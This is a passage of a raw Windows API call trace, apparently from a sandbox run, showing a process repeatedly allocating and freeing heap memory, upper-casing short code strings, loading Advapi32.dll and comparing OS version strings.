wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.262] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.262] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.263] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.263] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.263] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.263] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.264] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.264] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.266] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.267] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0268.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0268.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0268.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0268.268] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0268.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0268.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0268.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.271] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0268.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0268.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.273] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0268.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0268.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0268.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.273] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0268.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0268.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0268.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.275] HeapFree (in: 